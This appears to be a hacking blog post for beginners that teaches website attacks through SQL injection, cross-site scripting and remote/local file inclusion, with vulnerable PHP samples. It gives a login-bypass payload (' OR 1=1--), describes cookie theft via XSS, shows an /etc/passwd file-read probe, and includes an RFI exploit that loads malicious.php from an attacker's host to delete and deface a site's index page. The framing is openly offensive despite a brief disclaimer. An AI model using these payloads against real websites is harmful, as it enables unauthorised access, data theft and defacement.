Hello guys. I was a bit busy, so after a long time I’ll be posting
something new for the beginners in the world of hacking. Today I tell
you how to hack websites using common vulnerabilities. Note: I believe
you have some basic knowledge of HTML and PHP Intended for educational purpose. Bad intentions, GET LOST!!!!!!!
So lets begin
SQL Injection
SQL injection is the act of injection your own, custom-crafted SQL
commands into a web-script so that you can manipulate the database any
way you want. Some example usages of SQL injection: Bypass login
verification, add new admin account, lift passwords, lift credit-card
details, etc.; you can access anything that’s in the database.
Example Vulnerable Code – login.php (PHP/MySQL)
Here’s an example of a vulnerable login code
PHP Code:
php
$user = $_POST['u'];
$pass = $_POST['p'];
if (!isset($user) || !isset($pass)) {
echo(“<form method=post>
“);
} else {
$sql = “SELECT `IP` FROM `users` WHERE `username`=’$user’ AND `password`=’$pass’”;
$ret = mysql_query($sql);
$ret = mysql_fetch_array($ret);
if ($ret[0] != “”) {
echo(“Welcome, $user.”);
} else {
echo(“Incorrect login details.”);
}
}
?>
Basically what this code does, is take the username and password input,
and takes the users’s IP from the database in order to check the
validity of the username/password combo.
Testing Inputs For Vulnerability
Just throw an “‘” into the inputs, and see if it outputs an error; if
so, it’s probably injectable. If it doesn’t display anything, it might
be injectable, and if it is, you will be dealing with blind SQL
injection which anyone can tell you is no fun. Else, it’s not
injectable.
The Example Exploit
Let’s say we know the admin’s username is Administrator and we want into
his account. Since the code doesn’t filter our input, we can insert
anything we want into the statement, and just let ourselves in. To do
this, we would simply put “Administrator” in the username box, and “‘ OR
1=1–” into the password box; the resulting SQL query to be run against
the database would be “SELECT `IP` FROM `users` WHERE
`username`=’Administrator’ AND `password=” OR 1=1–’”. Because of the “OR
1=1″, it will have the ability to ignore the password requirement,
because as we all know, the logic of “OR” only requires one question to
result in true for it to succeed, and since 1 always equals 1, it works;
the “–” is the ‘comment out’ character for SQL which means it ignores
everything after it, otherwise the last “‘” would ruin the syntax, and
just cause the query to fail.
XSS (Cross-Site Scripting)
This vulnerability allows for an attacker’s input to be sent to
unsuspecting victims. The primary usage for this vulnerability is cookie
stealing; if an attacker steals your cookie, they can log into whatever
site they stole your cookie from under your account (usually, and
assuming you were logged in at the time.)
Example Vulnerable Code – search.php (PHP)
PHP Code:
php
$s = $_GET['search'];
// a real search engine would do some database stuff here
echo(“You searched for $s. There were no results found”);
?>
Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as
“<font color=red>XSS</font>”. If the site is vulnerable to
XSS, you will see something like this: XSS, else, it’s not vulnerable.
Example Exploit Code (Redirect)
Because we’re mean, we want to redirect the victim to goatse (don’t look
that up if you don’t know what it is) by tricking them into clicking on
a link pointed to “search.php?search=// “. This will output “You
searched for // . There were no results found” (HTML) and assuming the
target’s browser supports JS (JavaScript) which all modern browsers do
unless the setting is turned off, it will redirect them to abc.
RFI/LFI (Remote/Local File Include)
This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server.
Example Vulnerable Code – index.php (PHP)
PHP Code:
<?php
$page = $_GET['p'];
if (isset($page)) {
include($page);
} else {
include(“home.php”);
}
?>
Testing Inputs For Vulnerability
Try visiting “index.php?p=http://www.google.com/”; if you see Google, it
is vulnerable to RFI and consequently LFI. If you don’t it’s not
vulnerable to RFI, but still may be vulnerable to LFI. Assuming the
server is running *nix, try viewing “index.php?p=/etc/passwd”; if you
see the passwd file, it’s vulnerable to LFI; else, it’s not vulnerable
to RFI or LFI.
Example Exploit
Let’s say the target is vulnerable to RFI and we upload the following PHP code to our server
PHP Code:
<?php
unlink(“index.php”);
system(“echo Hacked > index.php”);
?>
and then we view “index.php?p=http://our.site.com/malicious.php” then
our malicious code will be run on their server, and by doing so, their
site will simply say ‘Hacked’ now.
Hope you must have a bit from here. Next time I’ll be posting new tutorials and hacks. Keep Reading
Subscribe to:
Post Comments (Atom)
Please try to comment if i have done well or if you have finished learning from the blog
EmoticonEmoticon